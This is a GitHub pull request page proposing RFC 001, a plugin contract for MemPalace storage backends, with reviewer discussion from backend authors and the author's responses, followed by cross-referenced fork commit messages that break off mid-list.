Skip to content

docs: RFC 001 — storage backend plugin specification#743

Open
igorls wants to merge 5 commits intodevelopfrom
docs/rfc-storage-backend-plugin-spec
Open

docs: RFC 001 — storage backend plugin specification#743
igorls wants to merge 5 commits intodevelopfrom
docs/rfc-storage-backend-plugin-spec

Conversation

@igorls
Copy link
Copy Markdown
Member

@igorls igorls commented Apr 12, 2026

Summary

  • Drafts a formal contract for MemPalace storage backends so third parties can ship pip install mempalace-<name> packages that drop into core without patches.
  • Resolves the open design decisions deliberately deferred by the Мempalace backend seam #413 seam, driven by the six in-flight backend PRs each implementing the interface differently.
  • Sets the stage for MemPalace as a long-lived daemon managing many palaces, where different palaces may route to different backends.

Tracking issue: #737 (see discussion and follow-up comments for the design rationale).

Key decisions in the draft

  • Distribution: entry-point group mempalace.backends; pip install is sufficient to add a backend.
  • Return types: typed QueryResult / GetResult dataclasses replace Chroma's dict shape from day one. ChromaCollection gets a thin adapter.
  • Daemon-first model: PalaceRef(id, local_path?, namespace?) replaces palace_path: str. Backend instances are long-lived and multi-palace; thread-safe across palaces.
  • Where-clause contract: required subset $eq, $ne, $in, $nin, $and, $or, $contains; unknown operators MUST raise UnsupportedFilterError (silent drop forbidden).
  • Embedder decoupling: mandatory injection; backends persist model_name and raise EmbedderIdentityMismatchError on swap (not just dimension).
  • Capability tokens: supports_* naming, free-form strings, extensible by third parties.
  • Conformance: shared AbstractBackendContractSuite pytest mixin + optional parametrized run of the core suite across all backends under MEMPALACE_TEST_ALL_BACKENDS=1.
  • Benchmark honesty: optional maintenance_state() / run_maintenance(kind); published numbers must cover three phases (post-load, post-native-maintenance, post-explicit-maintenance).
  • Migration: backend-neutral mempalace migrate + mempalace verify operating through BaseCollection only — no per-backend migration code.
  • Sync: capability flag + separate subsystem; local deployments never load it.

Impact on in-flight PRs

Each of #574, #643, #665, #697, #700, #381 is called out in §11 with the specific alignment work required — #574 is closest to the final shape, #697's collection_prefix concern dissolves into PalaceRef.namespace, #700 and #381 need the canonical UUID5 namespace.

Gating cleanup (not in this PR)

Seven files still import chromadb directly (repair.py, dedup.py, cli.py ×2, mcp_server.py, migrate.py, plus an instructions doc). Combined with the dict-to-typed-result migration, this needs its own PR landing before the spec can be enforced. Called out in §10.

Test plan

  • Backend authors (@skuznetsov @dekoza @RobertoGEMartin @cschnatz @Anush008) review for show-stoppers against their PRs
  • Agreement on the three open questions in §12 (per-collection changes_since filter, per-palace capability query, run_maintenance return shape)
  • Canonical NAMESPACE_MEMPALACE UUID assigned (§7.4)
  • Once approved, follow-up PR to land the seam cleanup + typed-result migration (§10)
  • Follow-up PR to land AbstractBackendContractSuite + entry-point discovery + PalaceRouter + PalaceRef

Formalizes the BaseCollection/BaseBackend contract introduced as a seam
in #413 into an interchangeability spec that third-party backends can
build to. Driven by six in-flight backend PRs (#574, #643, #665, #697,
#700, #381) each implementing the interface differently.

Key decisions captured: entry-point distribution, typed QueryResult/
GetResult replacing Chroma dict shape, daemon-first multi-palace model
via PalaceRef, required where-clause subset (incl. $contains),
mandatory embedder injection with model-identity validation, capability
tokens, shared pytest conformance suite, and a backend-neutral
migrate/verify CLI.
Copilot AI review requested due to automatic review settings April 12, 2026 23:27
Copy link
Copy Markdown
Contributor

Copilot AI left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

This PR introduces RFC 001, a draft specification for MemPalace storage backend plugins. It formalizes a stable contract so third-party backends can be distributed as mempalace-<name> Python packages and loaded into MemPalace via entry-point discovery, enabling multi-backend / multi-palace (daemon-first) deployments.

Changes:

  • Adds a full draft spec defining the BaseCollection / backend lifecycle contract, including typed QueryResult / GetResult shapes.
  • Specifies backend discovery/selection (entry points + registry), configuration shape, and capability-token conventions.
  • Defines required filter dialect behavior, migration/verification expectations, and a shared backend conformance test suite concept.

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

Comment thread docs/rfcs/001-storage-backend-plugin-spec.md Outdated
Comment thread docs/rfcs/001-storage-backend-plugin-spec.md Outdated
igorls added 2 commits April 12, 2026 20:35
Copilot review flagged back-references in §1.4 and §6 that still used
the pre-skuznetsov-rename names (`$contains_fast`, `sync_capable`,
`change_feed`). Updated to the `supports_*` prefix used in the §2.1
capability table.
Incorporates review feedback from skuznetsov (Postgres, #665) and
dekoza (Lance, #574) on issue #737:

- §1.5: split 'accepts embeddings=' (signature compliance) from
  'persists embeddings as-is' (correctness). Adds
  supports_embeddings_passthrough capability; the former is universal,
  the latter is required to label a migration lossless.
- §1.5: model identity check becomes a three-state machine
  (known_match / known_mismatch / unknown) so legacy palaces without
  recorded identity don't hard-fail on upgrade.
- §1.4: makes explicit that supports_contains_fast is the ONLY
  performance floor the spec promises; without it callers MUST assume
  O(n). $contains is a correctness requirement, not a performance one.
- §3.3: clarifies auto-detect is an upgrade-compat path only, never
  the selection mechanism for new palaces.
- §8.2: migrate CLI refuses to run against a target lacking
  supports_embeddings_passthrough unless --accept-re-embed is passed;
  migration record now captures lossless status and model identities.
Copy link
Copy Markdown

@dekoza dekoza left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Reviewed from the LanceDB (#574) perspective. No show-stoppers — our implementation is already close to the spec's target shape. Notes below.

§1.1 — kwargs-only signatures

Our backends/lance.py already uses kwargs-only on add/upsert, and our BaseCollection ABC in backends/base.py does the same (work done in #575, easily backported). query/get/delete currently use **kwargs catch-all — those need explicit parameter lists to match the spec.

§1.1 — query_embeddings and where_document

Our query() doesn't accept query_embeddings and neither query() nor get() accepts where_document. Both are straightforward for LanceDB:

  • query_embeddings: skip the embed step, search the vector directly
  • where_document: same $contains path (Tantivy FTS or LIKE fallback)

§1.1 — update() method

Our BaseCollection and LanceCollection already have an update() method (fetches existing records, merges changes, re-upserts). The spec's BaseCollection does not include update(), though supports_update exists as a capability token. Is update() intentionally excluded from the required interface, or an oversight? If it stays out, we'd keep it as a LanceDB-specific extension — but it seems generally useful.

§1.3 — Typed results

Our return shapes already match QueryResult/GetResult field structure. Migration is wrapping dict construction in dataclass constructors. No concern.

§1.5 — Three-state model identity

We persist embedding_model per-record in metadata_json but not at collection level. Spec wants collection-level persistence + check on open. LanceDB supports table-level metadata via Arrow schema metadata — clean fit. The unknown state for legacy palaces is the right call; hard-failing on upgrade would break existing users.

§2.3 — BaseBackend class

We already have LanceBackend in backends/lance.py with a get_collection() factory method (from #575, easily backported to #574). It currently takes palace_path: str — adapting to PalaceRef is straightforward. It does not yet subclass a BaseBackend ABC (spec §2.3), but the method shape is close.

§3.3 — Auto-detection

Our backends/__init__.py already has detect_backend() sniffing for .lance directories. Adapting to a BaseBackend.detect(path) -> bool classmethod is trivial. Agree with the spec's framing that auto-detection is a migration compatibility path, not a selection mechanism.

§6 — Sync compatibility note

Our sync implementation uses a _raw=True flag on upsert() to skip sync metadata injection during sync apply. The spec's BaseCollection.upsert() has no such parameter, which is correct — sync concerns should not leak into the collection contract. This means we need to refactor sync injection out of LanceCollection into a wrapper layer, which aligns with §6's "sync is a separate subsystem" stance. Wanted to flag this since other backends implementing sync will face the same design question.

§10 — Cleanup gating

+1 on landing the Chroma direct-import cleanup before backend PRs rebase. The seven files importing chromadb directly would break any pure-Lance deployment. This cleanup benefits all backend authors equally.

§11 — Alignment effort for #574

Assessment is accurate. We already have backends/ with BaseCollection ABC, LanceBackend, and kwargs-only signatures (work from #575, easily backported). Remaining work: explicit param lists on query/get/delete (instead of **kwargs), typed results, $contains/where_document, collection-level model identity, PalaceRef adoption, conformance test subclass, sync injection refactor, and package extraction to mempalace-lance. All small-to-medium. No architectural conflicts.

§12 — Open questions

  1. changes_since with collection filter — yes, useful. Our sync tracks changes per-table; filtering by collection name is natural.
  2. Per-palace capabilities — worth having. supports_contains_fast depending on whether an FTS index exists is a real case for us.
  3. run_maintenance return shape — structured return preferred. LanceDB compaction can report fragment count before/after and bytes reclaimed, useful for operator dashboards and benchmark reporting.

@skuznetsov
Copy link
Copy Markdown
Contributor

Reviewed the actual RFC diff. From the Postgres / pg_sorted_heap side, I do not see a blocker. The direction is compatible with #665: injected embedder, explicit capability tokens, lossless-vs-reembed migration split, and maintenance-state benchmark hooks all map cleanly.

Three small spec-clarity points I would consider before backend authors start rebasing:

  1. Goal wording vs §8.2 migration semantics

The Goals section says mempalace migrate moves palaces between backends “without data loss”. §8.2 is more precise: migration is lossless only when the source supports embedding export, the target supports embedding passthrough, and model identity is compatible. I would mirror that nuance in the Goals section so the RFC does not overpromise. Suggested framing: “supports lossless migration when source/target capabilities allow it, and explicit re-embedding otherwise.”

  1. server_embedder needs an explicit identity/dimension contract

§1.5 says backends MUST NOT hardcode models and must validate model identity/dimension, but §2.1 / §5 allow server_embedder backends to ignore the injected embedder. That can be valid, but the RFC should say what identity gets recorded and validated in that mode. For example: a server-embedder backend should expose its effective model_name and dimension, and the same dimension/model identity rules should apply to that effective embedder. Otherwise server_embedder becomes an implicit escape hatch from the safety rules.

  1. Maintenance kinds need discovery

§7.3 says benchmarks should run explicit run_maintenance if the backend advertises maintenance kinds, but I do not see where those kinds are advertised. A small hook would make the benchmark harness deterministic, e.g. maintenance_kinds: frozenset[str] or maintenance_state()["supported_kinds"]. Without that, harnesses will need backend-specific knowledge to decide whether "analyze", "compact", or "reindex" exists.

None of these change the shape of the RFC. They are mostly guardrails to keep the spec precise once implementations begin targeting it.

Copy link
Copy Markdown
Collaborator

@jphein jphein left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Reviewed from the perspective of a 134K-drawer production deployment on the Chroma backend, with experience evaluating LanceDB (via Karta's embedded LanceDB + SQLite architecture).

No show-stoppers. This is the right time to formalize the backend contract — the six-way divergence is already causing friction. Notes below.

§1.3 — Typed results (migration cost for existing forks/consumers)

This is a breaking change for anyone with code touching mcp_server.py or searcher.py that assumes dict returns. My fork has ~20 changes across those files — all dict-shaped. The migration path is clear (wrap in dataclass constructors, same as dekoza noted), but the blast radius is worth calling out: it's not just backend authors who need to update, it's everyone downstream who consumes query results. A compatibility shim (.to_dict() on the result types) during the transition would make the upgrade gentler for plugin authors and forks.

§1.5 — Three-state model identity is exactly right

My palace has 134K drawers with no recorded embedder identity. Hard-failing on upgrade would brick every pre-v1 palace. The unknown → warn → record-on-next-write path is the correct design. One detail: the spec says the identity is recorded "on the next successful write, reindex, or migration." For read-heavy deployments that rarely write new drawers, this means the palace could stay in unknown state indefinitely. Consider also recording on explicit mempalace verify or mempalace status (read-only operations that already touch the collection) so operators can resolve it without forcing a write.

§2.5 — Concurrency guarantee matches real usage

The spec says backends can assume single-thread access per collection, with core serializing per palace. This matches how the MCP server actually works today — good call. My fork added threading.Lock to the graph cache (#661) because build_graph() was the one place concurrent access was possible. The per-palace serialization guarantee would have made that unnecessary. Worth documenting this guarantee prominently so backend authors don't over-synchronize.

§7.3 — Benchmark methodology is the most underrated section

At 134K drawers on Chroma, I've hit the HNSW pathology firsthand — the graph's on-disk size and query latency behave very differently before and after compaction, and after external writes that invalidate the in-memory index (the exact problem my stale HNSW mtime detection fix addresses in #663). The three-phase benchmark requirement (post-bulk-load, post-background-maintenance, post-explicit-maintenance) would have caught the performance cliff I found empirically. Strong +1 on maintenance_state() being part of the published numbers.

§8 — Migration at scale

At 134K drawers, re-embedding is not a minor cost — it's hours of compute depending on the model. The lossless vs re-embed distinction and the --accept-re-embed explicit opt-in are the right design. One request: mempalace migrate should report progress (rows migrated / total, ETA) for large palaces. A 134K-drawer migration that runs silently for hours will get killed by impatient operators.

§10 — Cleanup prerequisite will affect fork contributors

My fork's mcp_server.py imports chromadb directly for the BLOB seq_id repair (#664) and mtime-based cache invalidation (#663). Both are deeply Chroma-specific. The cleanup PR routing all callers through BaseCollection is the right gating decision, but it will require Chroma-specific fixups to move behind the backend boundary. Backend-specific maintenance operations (like BLOB repair) might need a BaseBackend.repair() or similar escape hatch — otherwise they end up as out-of-band scripts that bypass the abstraction.

§12 — Open questions

  1. Per-palace capabilities — yes. supports_contains_fast depending on whether an FTS index exists is a real case. I'd add: supports_mtime_detection or similar for backends where external-write detection is possible (Chroma via SQLite mtime) vs not (server-mode backends where the filesystem isn't local). My #663 fix is Chroma-specific precisely because mtime detection only makes sense for local file-backed stores.

Addresses the actual spec defects flagged in #743 review, ignoring
operator-UX asks that are not plugin-contract concerns.

- Goal #3: 'without data loss' → mirrors §8.2's capability-conditional
  lossless-vs-reembed framing. No more overpromise.
- §1.5: `server_embedder` is no longer an implicit escape hatch from
  identity/dimension rules. Such backends MUST expose an effective
  identity via `effective_embedder_identity()` and are bound by the
  same three-state check.
- §7.3: adds `maintenance_kinds: ClassVar[frozenset[str]]` advertisement
  mechanism. `run_maintenance(kind)` must raise
  UnsupportedMaintenanceKindError for unadvertised kinds. Benchmark
  harness reads this set rather than guessing kind names. Reserves
  `analyze`/`compact`/`reindex` as well-defined names.
- §1.2: adds `update()` as optional method with a default get+merge+
  upsert implementation. §2.1: `supports_update` redefined to gate
  atomic single-round-trip semantics (not mere capability), since the
  default impl already supports partial updates.

Operator asks explicitly NOT adopted (diplomatic shims, not contract
defects): `.to_dict()` compat on typed results, migration progress
reporting, `BaseBackend.repair()` separate from `run_maintenance`,
per-palace capability variance, identity recording on read-only ops.
@igorls
Copy link
Copy Markdown
Member Author

igorls commented Apr 13, 2026

Thanks @skuznetsov @dekoza @jphein — substantive reviews on all sides. Commit 922aa99 closes the four spec defects the reviews surfaced. A number of reasonable operator asks are explicitly not being adopted; explaining both below, so the boundary is clear for anyone implementing against this.

Adopted — spec defects

1. Goals wording (skuznetsov) — Goal 3 now mirrors §8.2 instead of overpromising "without data loss." The spec delivers lossless migration when capabilities allow, re-embedding otherwise. Both are explicit; neither is hidden.

2. server_embedder identity contract (skuznetsov) — a stated safety invariant with an unspecified escape hatch is a real correctness hole. Closed:

A backend advertising server_embedder (§2.1) provides its own embedder and MAY ignore the embedder= kwarg passed to get_collection. That does not exempt it from the dimension and identity rules above. Such backends MUST expose an effective model_name: str and dimension: int via BaseCollection.effective_embedder_identity(), persist that effective identity on first write, and validate it on open under the same three-state rules.

server_embedder now documents where the embedding happens; it never suspends the safety contract. A backend that can't report its effective embedder identity doesn't qualify for the capability.

3. maintenance_kinds discovery (skuznetsov) — §7.3 referenced something the spec never defined. Fixed with a class-level maintenance_kinds: ClassVar[frozenset[str]]. The spec reserves "analyze", "compact", "reindex" as well-defined names; backends may add their own. run_maintenance(kind) MUST raise UnsupportedMaintenanceKindError for unadvertised kinds. The benchmark harness reads this set rather than guessing names.

4. update() method / supports_update mismatch (dekoza) — a capability token that gates nothing is incoherent. update() is now an optional method in §1.2 with a default implementation (get → merge → upsert). supports_update is redefined to gate atomic, single-round-trip semantics — not the mere ability to do partial updates, which the default already provides. Backends with native primitives (Postgres UPDATE, Lance merge_insert) override and advertise; others inherit the default.

Not adopted — operator comfort, not plugin-contract concerns

These are all reasonable asks, and I want to be explicit that they're not dismissed because they're wrong — they're not adopted because they don't belong in this spec. A well-engineered plugin contract has a small, stable surface. Layering operator-UX conveniences into the core interface makes it worse for every future backend author.

  • .to_dict() compat shim on typed results (jphein) — directly contradicts §1.3's design intent of dropping the Chroma dict shape. Adding an escape hatch re-legitimizes the thing the spec removes. Fork migration pain is what minor version bumps are for; callers move to attribute access.

  • Migration progress reporting (jphein) — CLI UX concern. Belongs in the mempalace migrate implementation, not in the backend contract. A backend doesn't care whether the CLI prints a progress bar. The CLI PR will implement it; the spec says nothing about it.

  • BaseBackend.repair(kind) escape hatch (jphein) — redundant with run_maintenance(kind). "Repair" is a maintenance kind, not a separate concept. Keeping them distinct would fragment the same mechanism. Chroma's BLOB seq_id repair becomes run_maintenance("repair") or a Chroma-specific reserved kind.

  • Per-palace capability variance (dekoza, jphein) — this muddies the contract. Capabilities advertise what a backend can do. Making them palace-dependent turns every capability check into "maybe — depends." That pushes state tracking onto every caller for a small gain. A backend that builds indexes lazily either guarantees the index exists when needed (and advertises the capability) or doesn't. Static contract.

  • Identity recording on read-only ops (jphein) — complicates the state machine for an operator-UX concern. "My read-heavy palace stays unknown forever" is solved by mempalace palace set-embedder --model NAME (already in §1.5), not by making the state transition rules asymmetric.

  • supports_mtime_detection (jphein) — almost certainly redundant with sync change-feed contract once the sync subsystem is specified. Don't add capabilities speculatively.

Net

Four spec edits, small and targeted. The contract is tighter for it. The rejected items are good ideas for the implementations — CLI progress, fork-friendly shims, richer operator tooling — they just don't live in the plugin contract.

#743 is ready for another look.

@skuznetsov
Copy link
Copy Markdown
Contributor

Thanks, this addresses my Postgres / pg_sorted_heap concerns. The revised goal wording, server_embedder identity contract, and maintenance_kinds discovery hook all look aligned with what #665 needs. I’m good with this RFC direction from the Postgres backend side and will review the implementation PRs when they land.

#757 landed mtime/inode cache invalidation and mempalace_reconnect
in mcp_server._get_client(). Both are Chroma-specific (stat of
chroma.sqlite3). They should migrate into ChromaBackend.get_collection
and ChromaBackend.close_palace during the §10 cleanup so the freshness
contract lives inside the backend, not in the caller.
@igorls igorls added area/install pip/uv/pipx/plugin install and packaging documentation Improvements or additions to documentation storage labels Apr 14, 2026
igorls added a commit that referenced this pull request Apr 14, 2026
Prerequisite for RFC 001 (plugin spec, #743). Removes every direct
`import chromadb` outside the ChromaDB backend itself so the core
modules depend only on the backend abstraction layer.

Extends ChromaBackend with make_client, get_or_create_collection,
delete_collection, create_collection, and backend_version. Adds
update() to the BaseCollection contract. Non-backend callers
(mcp_server, dedup, repair, migrate, cli) now go through the
abstraction; tests patch ChromaBackend instead of chromadb.

With this landed, the RFC 001 spec can be enforced and PalaceStore
(#643) can ship as a plugin without touching core modules.
@skuznetsov
Copy link
Copy Markdown
Contributor

Quick coordination question from the PostgreSQL / pg_sorted_heap backend side:

Is RFC 001 now stable enough to use as the target contract for reworking #665, or would you prefer that implementation PRs wait until #743 is merged and the §10 backend cleanup follow-up starts/lands?

From my side, the expected #665 rewrite would target the RFC shape directly:

  • injected/recorded embedder identity instead of backend-owned embedding globals
  • typed QueryResult / GetResult
  • BaseBackend / BaseCollection + capability tokens
  • PalaceRef
  • maintenance hooks (maintenance_kinds, maintenance_state, run_maintenance)
  • conformance test coverage
  • conservative docs positioning for pgvector vs optional pg_sorted_heap

I’m asking to avoid rebasing the current conflicting branch into an intermediate shape if the intended path is now RFC-first.

@cschnatz
Copy link
Copy Markdown

Read the full spec. From the multi-tenant hosted side (#697), this looks solid.

Works for us

  • §4.4 PalaceRef.namespace absorbs our collection_prefix cleanly. We're already building shared team palaces on top of this — personal vaults map to PalaceRef(namespace="tenant_<uuid>"), team vaults to PalaceRef(namespace="team_<uuid>"), and search fans out across both. The namespace abstraction is exactly what we need.
  • §2.5 Concurrency model matches our sidecar design.
  • §3.1 Entry points mean we can ship our ChromaHttpBackend as a proper plugin instead of vendoring.

Questions

1. Namespace isolation — security boundary or naming convention?

For us, namespace is a tenant isolation boundary. When a user searches across personal + team vaults, the sidecar resolves which namespaces to query based on a gateway-authorized team_ids list. A team namespace that isn't in that list gets rejected. §4.4 says "the backend uses it as given" — should backends also enforce namespace isolation, or is that purely the caller's job?

2. PalaceRef.id uniqueness scope

Unique globally or per backend instance?

3. Typed results (§1.3) — hard cutover?

Is there a transition period, or do all callers need to migrate from Chroma dicts in one go? We have 30 MCP tool functions consuming dict shapes.

4. §7.4 NAMESPACE_MEMPALACE

Worth assigning now — the placeholder blocks Qdrant PRs.

5. §10 mcp_server caching

We hit a related bug (collection cache bleed between tenants). Moving caching into ChromaBackend.get_collection() would fix this structurally.

#697 alignment

Our collection_prefix dissolves into PalaceRef.namespace as described in §11. Ready to rebase once spec + cleanup PR land. Happy to be an early conformance suite adopter.

igorls added a commit that referenced this pull request Apr 18, 2026
…nd registry (RFC 001 §10)

Advances RFC 001 §10 cleanup so backend-author PRs (#574 LanceDB, #665 Postgres,
#700 Qdrant, #697 hosted, #643 PalaceStore, #381 Qdrant) have a stable target
to align against.

Scope (this PR):

- Typed QueryResult / GetResult dataclasses replace Chroma's dict shape at
  the BaseCollection boundary (§1.3). A transitional _DictCompatMixin keeps
  existing callers working while the attribute-access migration proceeds.
- BaseCollection is now kwargs-only across add/upsert/query/get/delete/update
  with ABC defaults for estimated_count/close/health and a non-atomic default
  update() (§1.1–1.2).
- PalaceRef replaces raw path strings at the backend boundary (§2.2).
- BaseBackend ABC with get_collection/close_palace/close/health/detect (§2.3).
- mempalace.backends entry-point group + in-tree registry with
  resolve_backend_for_palace priority order matching §3.2–3.3.
- ChromaCollection normalizes chroma returns into typed results; unknown
  where-clause operators raise UnsupportedFilterError (no silent drop, §1.4).
- ChromaBackend absorbs the inode/mtime client-cache freshness check
  previously duplicated in mcp_server._get_client() (§10 + PR #757).
- searcher.py migrated to typed-attribute access as the reference call
  site; remaining callers land in a follow-up.
- pyproject: chroma registered via [project.entry-points."mempalace.backends"].

Out of scope (explicit follow-ups):

- Full caller migration off the dict-compat shim across palace.py,
  mcp_server.py, miner.py, convo_miner.py, dedup.py, repair.py, exporter.py,
  palace_graph.py, cli.py, closet_llm.py.
- Embedder injection + three-state EmbedderIdentityMismatchError check (§1.5).
- maintenance_state() / run_maintenance() benchmark hooks (§7.3).
- AbstractBackendContractSuite full coverage (§7.1–7.2).
- mempalace migrate / mempalace verify CLI rewrites through BaseCollection (§8).

Tests: 970 passed (up from 967 on develop); new coverage for typed results,
empty-result outer-shape preservation, \$regex rejection, registry lookup,
priority resolver, and PalaceRef-kwarg ChromaBackend.get_collection.

Refs: #743 (RFC 001), #989 (RFC 002 tracking issue).
jphein added a commit to jphein/mempalace that referenced this pull request Apr 19, 2026
Scanned all 233 open upstream PRs today against our open PRs and
fork-ahead / planned-work items. Findings merged into README:

- P2 (decay) and P3 Tier-0 (LLM rerank): both covered by MemPalace#1032
  (@zackchiutw, MERGEABLE, 2026-04-19 — Weibull decay + 4-stage
  rerank pipeline). Older simpler version at MemPalace#337. Dropped as
  fork work; watching MemPalace#1032.
- P7 (alternative storage): formally out of scope. RFC 001 MemPalace#743
  (@igorls) defines the plugin contract; four backend PRs already
  in flight (MemPalace#700, MemPalace#381 Qdrant; MemPalace#574, MemPalace#575 LanceDB). Fork consumes,
  does not rebuild.
- P0 (multi-label tags): still fork/upstream candidate. MemPalace#1033
  (@zackchiutw) ships adjacent privacy-tag + progressive disclosure
  but not the full multi-label scheme.
- Merged MemPalace#1023 section acknowledges complementary MemPalace#976 (felipetruman)
  which adds broader mine_global_lock() + HNSW num_threads pin.

Gives future-us a map so we don't re-file MemPalace#1036-style duplicates.
Copy link
Copy Markdown
Collaborator

@bensig bensig left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Reviewed in full. This is the right shape and depth for a 1.0 spec — closes the open decisions deliberately deferred by #413, calls out the in-flight PR impact concretely, names the cleanup work it depends on, and stays out of scope where deferral is honest (sync, wire protocol, embedder).

Approving on merit. One mechanical block + a few suggestions worth folding in before this lands.

Block

  • §7.4 `NAMESPACE_MEMPALACE = uuid.UUID("TO-BE-ASSIGNED-ONCE-FOR-ALL-TIME")` — placeholder. Needs an actual UUID assigned and recorded in the spec text before this merges, since the section explicitly says "fixed at spec v1 adoption." Suggest `python -c "import uuid; print(uuid.uuid4())"` and pin it.

Suggestions (small, fold-in-able)

  1. §5 references "a separate RFC" for the embedder contract. Worth either filing the tracking issue and linking it from this section, or marking the dependency as a parallel work item in §13. Right now the spec hard-depends on an external contract that has no anchor.

  2. §4.2 env var splitting rule for hyphenated/underscored backend names. The example uses backend name "pg_prod" in §4.1 but `MEMPALACE_POSTGRES_DSN` in §4.2. If users name a backend "pg_prod", does the env shape become `MEMPALACE_PG_PROD_`? `MEMPALACE_PG-PROD_`? Or is `MEMPALACE__` keyed by backend type not instance? One sentence would close it.

  3. §3.3 priority + global env interaction. A user with `MEMPALACE_BACKEND=postgres` set globally who opens a palace with on-disk Chroma artifacts gets postgres (env wins, auto-detect skipped). That's correct behavior, but worth one sentence calling it out — "setting MEMPALACE_BACKEND globally overrides existing-palace auto-detection; users opening pre-existing palaces should leave it unset." Saves a real support incident.

  4. §9 major-version mismatch error. "Refuses to load a backend declaring a different major version." Worth a one-line example of the error message shape so backend authors know what their users will see when they install an incompatible version. Drop a `BackendVersionMismatchError(...)` example next to the rule.

  5. §7.4 reserved maintenance kinds. `"analyze"` / `"compact"` / `"reindex"` are reserved with required semantics. Consider naming the non-required implementation pattern: e.g., "a backend that has no analogue for a kind MUST omit it from `maintenance_kinds` rather than declaring it as a no-op." Otherwise nothing prevents a benchmark harness from seeing `"analyze"` in `maintenance_kinds` and assuming it does what the spec says when the implementation is empty.

Strengths

  • Capability-token design is sharp. The signature-compliance vs semantic-guarantee split (`supports_embeddings_in` vs `supports_embeddings_passthrough`) is exactly the right granularity. Same for the `server_embedder` carve-out in §1.5 — `server_embedder` documents where embedding happens, never suspends the dimension/identity safety contract. Beautifully written paragraph; reads like it survived a real ambiguity.
  • Three-state embedder identity check (`known_match` / `known_mismatch` / `unknown`) is the kind of detail that prevents a real upgrade incident. Hard-failing legacy palaces from #413 would be hostile; this gives them a clean transition path with a warning.
  • §10 cleanup prerequisite is honest. Names the 7 files still importing `chromadb` directly with line numbers, calls out `mcp_server._get_client()` as a Chroma-specific cache that needs to migrate into `ChromaBackend.get_collection()` per §2.5. Most RFCs hand-wave this section; this one names the actual work.
  • Migration honesty (§8.2). Lossless vs re-embed is explicit; `--accept-re-embed` is required, written to the migration log, never silent. The pairing requirement (`supports_migration_export` source-side + `supports_embeddings_passthrough` target-side) prevents a class of subtle silent-degrade bugs.
  • Benchmark methodology in §7.3 is rare to see in an RFC and prevents the un-`ANALYZE`'d-Postgres-vs-settled-Chroma anti-pattern. Reserved kind names + three-phase publishing requirement + harness MUST NOT assume kind names — that's the level of rigor this saves you from re-litigating later.
  • §3.3 auto-detection scoped tightly. "Strictly a migration/upgrade compatibility path, not a general selection mechanism." Explicit configuration always wins. Right call.
  • §11 in-flight PR impact table is concrete. Shows this spec was written with the actual outstanding work in mind, not in a vacuum. Each PR has a one-line align-effort estimate.
  • §13 rollout sequence is realistic — cleanup first, spec second, Chroma updated third, in-flight rebased fourth, migration CLI fifth. Matches what's actually achievable.

Observation, not actionable

  • RFC 002 (source adapter plugin spec) shipped in v3.3.2 ahead of RFC 001. The numbering doesn't imply ordering, but it's worth noting Igor is comfortable shipping concrete implementation ahead of formal RFC merge. The §10 cleanup discipline + §11 PR impact table here suggest that's a deliberate pattern, not drift. Approving on the strength of that.

Once the UUID gets assigned and the four small clarifications are folded in, this is ready to merge as the contract that the v4.0-alpha backend work targets. Status can move from Draft to Accepted with a date.

arncore added a commit to arncore/mempalace that referenced this pull request Apr 25, 2026
* feat: add Hindi language support to i18n module

* Create SECURITY.md

This PR introduces a standard SECURITY.md policy file to the repository. 

While reviewing the codebase, I noticed there wasn't a defined channel for the private, responsible disclosure of security vulnerabilities. Adding this policy helps protect the project by guiding researchers to report bugs privately rather than in public issues. 

I highly recommend merging this and enabling GitHub's "Private Vulnerability Reporting" feature in your repository settings. I currently have some security findings I would like to share with the maintainers securely once a private channel or contact method is established.

* fix: save hook auto-mines transcript without MEMPAL_DIR (#840)

TDD: test written first, failed, then fixed.

Problem: save hook says "saved in background" but MEMPAL_DIR defaults
to empty, so nothing actually mines. Users get no auto-save despite
the hook firing every 15 messages.

Fix: use TRANSCRIPT_PATH (received from Claude Code in the hook's
JSON input) to discover the session directory. Mine that directory
automatically. MEMPAL_DIR is still supported as override but no
longer required.

Also fixed: bare python3 → $(command -v python3) for nohup safety.

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* release: v3.3.0 (#839)

* fix: add file-level locking to prevent multi-agent duplicate drawers

Root cause: when multiple agents mine simultaneously, both pass
file_already_mined() check, both delete+insert the same file's
drawers, creating duplicates or losing data.

Fix: mine_lock() in palace.py — cross-platform file lock (fcntl on
Unix, msvcrt on Windows). Both miner.py and convo_miner.py now lock
per-file during the delete+insert cycle and re-check after acquiring
the lock.

Tested:
- Lock acquires and releases correctly
- Second agent blocks until first releases (0.25s wait)
- 33/33 existing tests pass
- Cross-platform: fcntl (macOS/Linux), msvcrt (Windows)

Based on v3.2.0 tag.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: strip system tags, hook output, and Claude UI chrome from drawers

normalize.py now strips before filing:
- <system-reminder>, <command-message>, <command-name> tags
- <task-notification>, <user-prompt-submit-hook>, <hook_output> tags
- Hook status messages (CURRENT TIME, Checking verified facts, etc.)
- Claude Code UI chrome (ctrl+o to expand, progress bars, etc.)
- Collapsed runs of blank lines

This noise was going straight into drawers, wasting storage space
and polluting search results. strip_noise() runs on all normalized
output regardless of input format (JSONL, JSON, plain text).

689/689 tests pass.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat: add closet layer — searchable index pointing to drawers

The closet architecture was always part of MemPalace's design but
never shipped in the public codebase. This adds it.

Palace now has TWO collections:
- mempalace_drawers — full verbatim content (unchanged)
- mempalace_closets — compact AAAK-style index entries

How it works:
- When mining, each file gets a closet alongside its drawers
- Closet contains extracted topics, entities, quotes as pointers
- Closets pack up to 1500 chars, topics never split mid-entry
- Search hits closets first (fast, small), then hydrates the
  full drawer content for matching files
- Falls back to direct drawer search if no closets exist yet

Files changed:
- palace.py: get_closets_collection(), build_closet_text(),
  upsert_closet(), CLOSET_CHAR_LIMIT
- miner.py: process_file() now creates closets after drawers
- searcher.py: search_memories() tries closet-first search,
  hydrates drawers, falls back to direct search

Backwards compatible — existing palaces without closets continue
to work via the fallback path. Closets are created on next mine.

689/689 tests pass.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: enforce atomic topics in closets, extract richer pointers

